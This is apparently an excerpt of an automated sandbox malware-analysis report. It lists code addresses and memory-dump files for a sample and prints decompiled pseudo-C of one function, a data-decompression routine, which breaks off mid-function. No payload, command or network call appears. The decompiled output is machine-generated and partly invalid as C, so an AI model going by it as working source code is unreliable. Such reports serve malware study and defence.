                                                    0x00406ce4
                                                    0x00406ceb
                                                    0x00406cf0
                                                    0x00000000
                                                    0x00000000
                                                    0x00406d7e
                                                    0x00406d7e
                                                    0x00406d82
                                                    0x00407120
                                                    0x00407120
                                                    0x00000000
                                                    0x00407120
                                                    0x00406d88
                                                    0x00406d88
                                                    0x00406d8b
                                                    0x00406d8e
                                                    0x00406d92
                                                    0x00406d95
                                                    0x00406d9b
                                                    0x00406d9d
                                                    0x00406d9d
                                                    0x00406d9d
                                                    0x00406da0
                                                    0x00406da3
                                                    0x00000000
                                                    0x00000000
                                                    0x00406973
                                                    0x00406973
                                                    0x00406977
                                                    0x004070e4
                                                    0x004070e4
                                                    0x00000000
                                                    0x004070e4
                                                    0x0040697d
                                                    0x0040697d
                                                    0x00406980
                                                    0x00406983
                                                    0x00406987
                                                    0x0040698a
                                                    0x00406990
                                                    0x00406992
                                                    0x00406992
                                                    0x00406992
                                                    0x00406995
                                                    0x00406998
                                                    0x00406998
                                                    0x0040699b
                                                    0x0040699e
                                                    0x00000000
                                                    0x00000000
                                                    0x004069a4
                                                    0x004069a4
                                                    0x004069aa
                                                    0x00000000
                                                    0x00000000
                                                    0x004069b0
                                                    0x004069b0
                                                    0x004069b4
                                                    0x004069b7
                                                    0x004069ba
                                                    0x004069bd
                                                    0x004069c0
                                                    0x004069c1
                                                    0x004069c4
                                                    0x004069c6
                                                    0x004069cc
                                                    0x004069cf
                                                    0x004069d2
                                                    0x004069d5
                                                    0x004069d8
                                                    0x004069db
                                                    0x004069de
                                                    0x004069fa
                                                    0x004069fd
                                                    0x00406a00
                                                    0x00406a03
                                                    0x00406a0a
                                                    0x00406a0e
                                                    0x00406a10
                                                    0x00406a14
                                                    0x004069e0
                                                    0x004069e0
                                                    0x004069e4
                                                    0x004069ec
                                                    0x004069f1
                                                    0x004069f3
                                                    0x004069f5
                                                    0x004069f5
                                                    0x00406a17
                                                    0x00406a1e
                                                    0x00406a21
                                                    0x00000000
                                                    0x00406a27
                                                    0x00406a27
                                                    0x00000000
                                                    0x00406a27
                                                    0x00000000
                                                    0x00406a2c
                                                    0x00406a2c
                                                    0x00406a30
                                                    0x004070f0
                                                    0x004070f0
                                                    0x00000000
                                                    0x004070f0
                                                    0x00406a36
                                                    0x00406a36
                                                    0x00406a39
                                                    0x00406a3c
                                                    0x00406a40
                                                    0x00406a43
                                                    0x00406a49
                                                    0x00406a4b
                                                    0x00406a4b
                                                    0x00406a4b
                                                    0x00406a4e
                                                    0x00406a51
                                                    0x00406a51
                                                    0x00406a51
                                                    0x00406a57
                                                    0x00000000
                                                    0x00000000
                                                    0x00406a59
                                                    0x00406a59
                                                    0x00406a5c
                                                    0x00406a5f
                                                    0x00406a62
                                                    0x00406a65
                                                    0x00406a68
                                                    0x00406a6b
                                                    0x00406a6e
                                                    0x00406a71
                                                    0x00406a74
                                                    0x00406a77
                                                    0x00406a8f
                                                    0x00406a92
                                                    0x00406a95
                                                    0x00406a98
                                                    0x00406a98
                                                    0x00406a9b
                                                    0x00406a9f
                                                    0x00406aa1
                                                    0x00406a79
                                                    0x00406a79
                                                    0x00406a81
                                                    0x00406a86
                                                    0x00406a88
                                                    0x00406a8a
                                                    0x00406a8a
                                                    0x00406aa4
                                                    0x00406aab
                                                    0x00406aae
                                                    0x00000000
                                                    0x00406ab0
                                                    0x00406ab0
                                                    0x00000000
                                                    0x00406ab0
                                                    0x00406aae
                                                    0x00406ab5
                                                    0x00406ab5
                                                    0x00406ab5
                                                    0x00406ab5
                                                    0x00000000
                                                    0x00000000
                                                    0x00406af0
                                                    0x00406af0
                                                    0x00406af4
                                                    0x004070fc
                                                    0x004070fc
                                                    0x00000000
                                                    0x004070fc
                                                    0x00406afa
                                                    0x00406afa
                                                    0x00406afd
                                                    0x00406b00
                                                    0x00406b04
                                                    0x00406b07
                                                    0x00406b0d
                                                    0x00406b0f
                                                    0x00406b0f
                                                    0x00406b0f
                                                    0x00406b12
                                                    0x00406b15
                                                    0x00406b15
                                                    0x00406b1b
                                                    0x00406ab9
                                                    0x00406ab9
                                                    0x00406abc
                                                    0x00000000
                                                    0x00406abc
                                                    0x00406b1d
                                                    0x00406b1d
                                                    0x00406b20
                                                    0x00406b23
                                                    0x00406b26
                                                    0x00406b29
                                                    0x00406b2c
                                                    0x00406b2f
                                                    0x00406b32
                                                    0x00406b35
                                                    0x00406b38
                                                    0x00406b3b
                                                    0x00406b53
                                                    0x00406b56
                                                    0x00406b59
                                                    0x00406b5c
                                                    0x00406b5c
                                                    0x00406b5f
                                                    0x00406b63
                                                    0x00406b65
                                                    0x00406b3d
                                                    0x00406b3d
                                                    0x00406b45
                                                    0x00406b4a
                                                    0x00406b4c
                                                    0x00406b4e
                                                    0x00406b4e
                                                    0x00406b68
                                                    0x00406b6f
                                                    0x00406b72
                                                    0x00000000
                                                    0x00406b74
                                                    0x00406b74
                                                    0x00000000
                                                    0x00406b74
                                                    0x00000000
                                                    0x00406e01
                                                    0x00406e01
                                                    0x00406e05
                                                    0x0040712c
                                                    0x0040712c
                                                    0x00000000
                                                    0x0040712c
                                                    0x00406e0b
                                                    0x00406e0b
                                                    0x00406e0e
                                                    0x00406e11
                                                    0x00406e15
                                                    0x00406e18
                                                    0x00406e1e
                                                    0x00406e20
                                                    0x00406e20
                                                    0x00406e20
                                                    0x00406e23
                                                    0x00000000
                                                    0x00000000
                                                    0x00406bd1
                                                    0x00406bd1
                                                    0x00406bd4
                                                    0x00000000
                                                    0x00000000
                                                    0x00406f10
                                                    0x00406f10
                                                    0x00406f14
                                                    0x00406f36
                                                    0x00406f36
                                                    0x00406f39
                                                    0x00406f43
                                                    0x00406f46
                                                    0x00406f46
                                                    0x00000000
                                                    0x00406f46
                                                    0x00406f16
                                                    0x00406f16
                                                    0x00406f19
                                                    0x00406f1d
                                                    0x00406f20
                                                    0x00406f20
                                                    0x00406f23
                                                    0x00000000
                                                    0x00000000
                                                    0x00406fcd
                                                    0x00406fcd
                                                    0x00406fd1
                                                    0x00406fef
                                                    0x00406fef
                                                    0x00406fef
                                                    0x00406fef
                                                    0x00406ff6
                                                    0x00406ffd
                                                    0x00407004
                                                    0x00407004
                                                    0x0040700b
                                                    0x0040700e
                                                    0x00407015
                                                    0x00000000
                                                    0x00407018
                                                    0x00406fd3
                                                    0x00406fd3
                                                    0x00406fd6
                                                    0x00406fd9
                                                    0x00406fdc
                                                    0x00406fe3
                                                    0x00406f27
                                                    0x00406f27
                                                    0x00406f2a
                                                    0x00000000
                                                    0x00000000
                                                    0x004070be
                                                    0x004070be
                                                    0x004070c1
                                                    0x00406fc2
                                                    0x00406fc2
                                                    0x00406fc2
                                                    0x00000000
                                                    0x00406fc8
                                                    0x00000000
                                                    0x00406cf8
                                                    0x00406cf8
                                                    0x00406cfa
                                                    0x00406d01
                                                    0x00406d02
                                                    0x00406d04
                                                    0x00406d07
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x0040700b
                                                    0x0040700b
                                                    0x0040700e
                                                    0x00407015
                                                    0x00000000
                                                    0x00407018
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00406d3d
                                                    0x00406d3d
                                                    0x00406d40
                                                    0x00406d76
                                                    0x00406d76
                                                    0x00406ea6
                                                    0x00406ea6
                                                    0x00406ea6
                                                    0x00406ea6
                                                    0x00406ea9
                                                    0x00406ea9
                                                    0x00406eac
                                                    0x00406eae
                                                    0x00407138
                                                    0x00407138
                                                    0x00000000
                                                    0x00407138
                                                    0x00406eb4
                                                    0x00406eb4
                                                    0x00406eb7
                                                    0x00000000
                                                    0x00000000
                                                    0x00406ebd
                                                    0x00406ebd
                                                    0x00406ec1
                                                    0x00406ec4
                                                    0x00406ec4
                                                    0x00406ec4
                                                    0x00000000
                                                    0x00406ec4
                                                    0x00406d42
                                                    0x00406d42
                                                    0x00406d44
                                                    0x00406d46
                                                    0x00406d48
                                                    0x00406d4b
                                                    0x00406d4c
                                                    0x00406d4e
                                                    0x00406d50
                                                    0x00406d53
                                                    0x00406d56
                                                    0x00406d6c
                                                    0x00406d6c
                                                    0x00406d71
                                                    0x00406da9
                                                    0x00406da9
                                                    0x00406dad
                                                    0x00406dd6
                                                    0x00406dd9
                                                    0x00406ddb
                                                    0x00406de2
                                                    0x00406de5
                                                    0x00406de8
                                                    0x00406de8
                                                    0x00406ded
                                                    0x00406ded
                                                    0x00406def
                                                    0x00406df2
                                                    0x00406df9
                                                    0x00406dfc
                                                    0x00406e29
                                                    0x00406e29
                                                    0x00406e2c
                                                    0x00406e2f
                                                    0x00406ea3
                                                    0x00406ea3
                                                    0x00406ea3
                                                    0x00406ea3
                                                    0x00000000
                                                    0x00406ea3
                                                    0x00406e31
                                                    0x00406e31
                                                    0x00406e37
                                                    0x00406e3a
                                                    0x00406e3d
                                                    0x00406e40
                                                    0x00406e43
                                                    0x00406e46
                                                    0x00406e49
                                                    0x00406e4c
                                                    0x00406e4f
                                                    0x00406e52
                                                    0x00406e6b
                                                    0x00406e6d
                                                    0x00406e70
                                                    0x00406e71
                                                    0x00406e74
                                                    0x00406e76
                                                    0x00406e79
                                                    0x00406e7b
                                                    0x00406e7d
                                                    0x00406e80
                                                    0x00406e82
                                                    0x00406e85
                                                    0x00406e89
                                                    0x00406e8b
                                                    0x00406e8b
                                                    0x00406e8c
                                                    0x00406e8f
                                                    0x00406e92
                                                    0x00406e54
                                                    0x00406e54
                                                    0x00406e5c
                                                    0x00406e61
                                                    0x00406e63
                                                    0x00406e66
                                                    0x00406e66
                                                    0x00406e95
                                                    0x00406e9c
                                                    0x00406e26
                                                    0x00406e26
                                                    0x00406e26
                                                    0x00406e26
                                                    0x00000000
                                                    0x00406e9e
                                                    0x00406e9e
                                                    0x00000000
                                                    0x00406e9e
                                                    0x00406e9c
                                                    0x00406daf
                                                    0x00406daf
                                                    0x00406db2
                                                    0x00406db4
                                                    0x00406db7
                                                    0x00406dba
                                                    0x00406dbd
                                                    0x00406dbf
                                                    0x00406dc2
                                                    0x00406dc5
                                                    0x00406dc5
                                                    0x00406dc8
                                                    0x00406dc8
                                                    0x00406dcb
                                                    0x00406dd2
                                                    0x00406da6
                                                    0x00406da6
                                                    0x00406da6
                                                    0x00406da6
                                                    0x00000000
                                                    0x00406dd4
                                                    0x00406dd4
                                                    0x00000000
                                                    0x00406dd4
                                                    0x00406dd2
                                                    0x00406d58
                                                    0x00406d58
                                                    0x00406d5b
                                                    0x00406d5d
                                                    0x00406d60
                                                    0x00000000
                                                    0x00000000
                                                    0x00406abf
                                                    0x00406abf
                                                    0x00406ac3
                                                    0x00407108
                                                    0x00407108
                                                    0x00000000
                                                    0x00407108
                                                    0x00406ac9
                                                    0x00406ac9
                                                    0x00406acc
                                                    0x00406acf
                                                    0x00406ad2
                                                    0x00406ad5
                                                    0x00406ad8
                                                    0x00406adb
                                                    0x00406add
                                                    0x00406ae0
                                                    0x00406ae3
                                                    0x00406ae6
                                                    0x00406ae8
                                                    0x00406ae8
                                                    0x00406ae8
                                                    0x00000000
                                                    0x00000000
                                                    0x00406c4a
                                                    0x00406c4a
                                                    0x00406c4e
                                                    0x00407114
                                                    0x00407114
                                                    0x00000000
                                                    0x00407114
                                                    0x00406c54
                                                    0x00406c54
                                                    0x00406c57
                                                    0x00406c5a
                                                    0x00406c5d
                                                    0x00406c5f
                                                    0x00406c5f
                                                    0x00406c5f
                                                    0x00406c62
                                                    0x00406c65
                                                    0x00406c68
                                                    0x00406c6b
                                                    0x00406c6e
                                                    0x00406c71
                                                    0x00406c72
                                                    0x00406c74
                                                    0x00406c74
                                                    0x00406c74
                                                    0x00406c77
                                                    0x00406c7a
                                                    0x00406c7d
                                                    0x00406c80
                                                    0x00406c80
                                                    0x00406c80
                                                    0x00406c83
                                                    0x00406c85
                                                    0x00406c85
                                                    0x00000000
                                                    0x00000000
                                                    0x00406ec7
                                                    0x00406ec7
                                                    0x00406ec7
                                                    0x00406ecb
                                                    0x00000000
                                                    0x00000000
                                                    0x00406ed1
                                                    0x00406ed1
                                                    0x00406ed4
                                                    0x00406ed7
                                                    0x00406eda
                                                    0x00406edc
                                                    0x00406edc
                                                    0x00406edc
                                                    0x00406edf
                                                    0x00406ee2
                                                    0x00406ee5
                                                    0x00406ee8
                                                    0x00406eeb
                                                    0x00406eee
                                                    0x00406eef
                                                    0x00406ef1
                                                    0x00406ef1
                                                    0x00406ef1
                                                    0x00406ef4
                                                    0x00406ef7
                                                    0x00406efa
                                                    0x00406efd
                                                    0x00406f00
                                                    0x00406f04
                                                    0x00406f06
                                                    0x00406f09
                                                    0x00000000
                                                    0x00406f0b
                                                    0x00406f0b
                                                    0x00406c88
                                                    0x00406c88
                                                    0x00000000
                                                    0x00406c88
                                                    0x00406f09
                                                    0x0040713e
                                                    0x0040713e
                                                    0x00000000
                                                    0x00000000
                                                    0x0040676d
                                                    0x00407175
                                                    0x00407175
                                                    0x00000000
                                                    0x00407175
                                                    0x00406fc2
                                                    0x00407042
                                                    0x0040700b

                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39668944121.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.39668910636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669012668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669057368.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669238341.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669280533.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669312568.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669349693.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669430204.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669464054.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c054bf0c5d93fa0a7b6250bc48fdf5a8ef487737ec2afd77fa79e2fd840b2821
                                                    • Instruction ID: ad0bcc128236992ad7a4f6733702d2b43af4dc4d223e88fe38095793509b9f66
                                                    • Opcode Fuzzy Hash: c054bf0c5d93fa0a7b6250bc48fdf5a8ef487737ec2afd77fa79e2fd840b2821
                                                    • Instruction Fuzzy Hash: 62A15671D04229CBDF28CFA8C854AADBBB1FF44305F14816ED856BB281C7785986CF45
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00406F10 Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 98%
                                                    			E00406F10() {
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int* _t605;
				void* _t612;

				L0:
				while(1) {
					L0:
					if( *(_t612 - 0x40) != 0) {
						 *(_t612 - 0x84) = 0x13;
						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x4c);
						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
						__ecx =  *(__ebp - 0x58);
						__eax =  *(__ebp - 0x4c) << 4;
						__eax =  *(__ebp - 0x58) + __eax + 4;
						L130:
						 *(__ebp - 0x58) = __eax;
						 *(__ebp - 0x40) = 3;
						L144:
						 *(__ebp - 0x7c) = 0x14;
						L145:
						__eax =  *(__ebp - 0x40);
						 *(__ebp - 0x50) = 1;
						 *(__ebp - 0x48) =  *(__ebp - 0x40);
						L149:
						if( *(__ebp - 0x48) <= 0) {
							__ecx =  *(__ebp - 0x40);
							__ebx =  *(__ebp - 0x50);
							0 = 1;
							__eax = 1 << __cl;
							__ebx =  *(__ebp - 0x50) - (1 << __cl);
							__eax =  *(__ebp - 0x7c);
							 *(__ebp - 0x44) = __ebx;
							while(1) {
								L140:
								 *(_t612 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t612 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M0040717D))) {
										case 0:
											if( *(_t612 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t534 =  *( *(_t612 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t569);
											_push(9);
											_pop(_t570);
											_t608 = _t538 / _t569;
											_t540 = _t538 % _t569 & 0x000000ff;
											asm("cdq");
											_t603 = _t540 % _t570 & 0x000000ff;
											 *(_t612 - 0x3c) = _t603;
											 *(_t612 - 0x1c) = (1 << _t608) - 1;
											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
											_t611 = (0x300 << _t603 + _t608) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
												L10:
												if(_t611 == 0) {
													L12:
													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t611 = _t611 - 1;
													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
												} while (_t611 != 0);
												goto L12;
											}
											if( *(_t612 - 4) != 0) {
												GlobalFree( *(_t612 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t612 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 1;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t45 = _t612 - 0x48;
											 *_t45 =  *(_t612 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t612 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t612 - 0x40);
											if(_t546 ==  *(_t612 - 0x74)) {
												L20:
												 *(_t612 - 0x48) = 5;
												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t612 - 0x74) = _t546;
											if( *(_t612 - 8) != 0) {
												GlobalFree( *(_t612 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
											 *(_t612 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
											 *(_t612 - 0x84) = 6;
											 *(_t612 - 0x4c) = _t553;
											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 3;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											_t67 = _t612 - 0x70;
											 *_t67 =  &(( *(_t612 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L23:
											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
											if( *(_t612 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t605;
											_t588 = _t531 & 0x0000ffff;
											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
											if( *(_t612 - 0xc) >= _t564) {
												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
												 *(_t612 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												__eflags = _t532;
												 *_t605 = _t532;
											} else {
												 *(_t612 - 0x10) = _t564;
												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
												 *_t605 = (0x800 - _t588 >> 5) + _t531;
											}
											if( *(_t612 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 5;
												goto L170;
											}
											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L139:
											_t533 =  *(_t612 - 0x84);
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L100:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t335 = __ebp - 0x70;
											 *_t335 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t335;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L102;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
